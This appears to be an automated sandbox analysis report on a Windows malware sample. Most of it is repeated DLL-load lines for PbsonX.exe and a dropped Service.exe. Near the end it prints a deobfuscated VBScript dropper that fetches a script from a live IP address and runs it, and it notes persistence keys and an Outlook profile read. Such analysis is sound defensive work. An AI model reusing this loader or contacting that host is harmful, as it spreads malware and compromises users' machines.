Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell")URL = "http://192.210.215.11/zoom/aus1.js"ggg = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%")FILENAME = ggg +"\MKLTPZ.js"http_obj.open "GET", URL, Falsehttp_obj.sendstream_obj.type = 1 stream_obj.openstream_obj.write http_obj.responseBodystream_obj.savetofile FILENAME, 2shell_obj.run FILENAMEIWshShell3.ExpandEnvironmentStrings("%Temp%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/aus1.js", "false");IServerXMLHTTPRequest2.send();IWshShell3.ExpandEnvironmentStrings("%Temp%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/aus1.js", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\MKLTPZ.js", "2");IWshShell3.ExpandEnvironmentStrings("%Temp%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/aus1.js", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\MKLTPZ.js", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\MKLTPZ.js")
.NET source code contains potential unpacker
Source: PbsonX.exe.1.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.2.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E49C30 push esp; retf 013Ch 3_2_00E49D55
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 7_2_01739C30 push esp; retf 018Ah 7_2_01739D55
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 9_2_06768A1B push es; iretd 9_2_06768A1C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 9_2_0676C7BF push es; ret 9_2_0676C7C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224891E pushad ; iretd 15_2_0224891F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02248C2F pushfd ; iretd 15_2_02248C30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02248DDF push esp; iretd 15_2_02248DE0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 16_2_02A2891E pushad ; iretd 16_2_02A2891F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 16_2_02A28C2F pushfd ; iretd 16_2_02A28C30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 16_2_02A28DDF push esp; iretd 16_2_02A28DE0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 18_2_0116891E pushad ; iretd 18_2_0116891F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 18_2_01168DDF push esp; iretd 18_2_01168DE0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 18_2_01168C2F pushfd ; iretd 18_2_01168C30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 20_2_06B8C7BF push es; ret 20_2_06B8C7C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 20_2_06B889AB push es; iretd 20_2_06B88A1C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 20_2_06B88933 push es; iretd 20_2_06B88A1C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 22_2_0223891E pushad ; iretd 22_2_0223891F
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 22_2_02238C2F pushfd ; iretd 22_2_02238C30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 22_2_02238DDF push esp; iretd 22_2_02238DE0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 27_2_065BC75D push es; ret 27_2_065BC7C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 30_2_068E8A45 push es; ret 30_2_068E8A50
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 31_2_03189C30 push esp; retf 031Ah 31_2_03189D55
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 31_2_06FB8A1D push es; ret 31_2_06FB8A50
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 31_2_06FBC75D push es; ret 31_2_06FBC7C0
Source: PbsonX.exe.1.dr Static PE information: section name: .text entropy: 7.99555414898425
Source: Service.exe.2.dr Static PE information: section name: .text entropy: 7.99555414898425
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File created: C:\Users\user\AppData\Roaming\Service.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\PbsonX.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
